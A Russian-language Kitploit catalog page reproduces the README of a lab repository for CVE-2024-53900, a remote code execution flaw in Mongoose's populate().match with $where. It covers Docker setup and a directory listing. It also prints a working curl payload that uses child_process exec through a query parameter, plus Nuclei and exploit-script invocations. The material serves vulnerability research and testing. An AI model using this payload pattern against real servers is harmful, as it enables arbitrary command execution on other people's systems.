Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-53900 — Воспроизводимая среда и PoC для CVE-2024-53900, критическая RCE в Mongoose через populate().match $where. Включает автоматизированный эксплойт-скрипт и шаблон Nuclei для тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/www-spam/cve-2024-53900
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubwww-spam/cve-2024-53900

CVE-2024-53900

Воспроизводимая среда и PoC для CVE-2024-53900, критическая RCE в Mongoose через populate().match $where. Включает автоматизированный эксплойт-скрипт и шаблон Nuclei для тестирования безопасности.

Репозиторий
0 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-53900 - Уязвимость удаленного выполнения кода в Mongoose populate().match $where

Этот репозиторий предоставляет воспроизводимую уязвимую среду и PoC для CVE-2024-53900 — критической уязвимости удаленного выполнения кода (RCE) в Mongoose версии < 8.8.3.


📌 Детали уязвимости

  • CVE: CVE-2024-53900
  • Затронутая версия: Mongoose < 8.8.3
  • Серьезность: Критическая (CVSS 9.1)
  • Вектор: populate().match в сочетании с $where
  • Воздействие: Произвольное выполнение JavaScript (RCE) в контексте Node.js

Ссылки:

  • Уведомление на GitHub
  • Исправляющий коммит

🛠️ Инструкция по настройке

1. Клонирование репозитория

root@kitploit:~
git clone https://github.com/www-spam/CVE-2024-53900.git
cd CVE-2024-53900

2. Запуск окружения (Docker Compose)

root@kitploit:~
docker-compose up -d

📌 GUI PoC (Калькулятор)

По умолчанию уязвимое Node.js-приложение работает внутри Docker.
Однако графические приложения (например, xcalc или gnome-calculator) не запустятся внутри контейнера.

👉 Если вы хотите продемонстрировать RCE путем открытия окна калькулятора:

  1. Запустите MongoDB в Docker (как базу данных)

    root@kitploit:~
    docker run -d --name mongo -p 27017:27017 mongo:6
    
  2. Запустите уязвимое Node.js-приложение локально

root@kitploit:~
   cd ~/cve-2024/app
   npm install
   node server.js
  • MongoDB работает на порту 27017
  • Уязвимое Node.js-приложение работает на порту 5000

📂 Структура каталогов

root@kitploit:~
/home/kali/cve-2024/
├── docker-compose.yml     # Environment setup
├── exploit.py             # Automated exploit script
├── CVE-2024-53900.yaml    # Nuclei template
├── README.md              # Documentation
├── app/                   # Vulnerable Node.js app
│   ├── Dockerfile
│   ├── package.json
│   ├── server.js
│   ├── models.js
│   └── views/
└── data/                  # MongoDB volume

🚀 Эксплуатация

Ручной тест

root@kitploit:~
curl "http://localhost:5000/book/{OBJECT_ID}/detail?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('xcalc')"

Автоматизированный PoC

root@kitploit:~
python3 exploit.py --url http://localhost:5000

С помощью Nuclei

root@kitploit:~
nuclei \ -u http://localhost:5000/book/{{OBJECT_ID}/detail \ -t ~/.local/nuclei-templates/CVE-2024-53900.yaml \ -var pfield=author
image

🔒 Замечания по безопасности

  • Только для исследований и тестирования (не для продакшена).
  • Полезная нагрузка ограничена безопасными операциями (например, создание файла).
  • Полная изоляция с помощью Docker.

✅ Протестированное окружение

  • ОС: Kali Linux
  • MongoDB: mongo:6
  • Node.js: 18
  • Mongoose: 8.5.0 (уязвимая)
  • Express: 4.18.2

📸 Демонстрация

Image
Скачать инструмент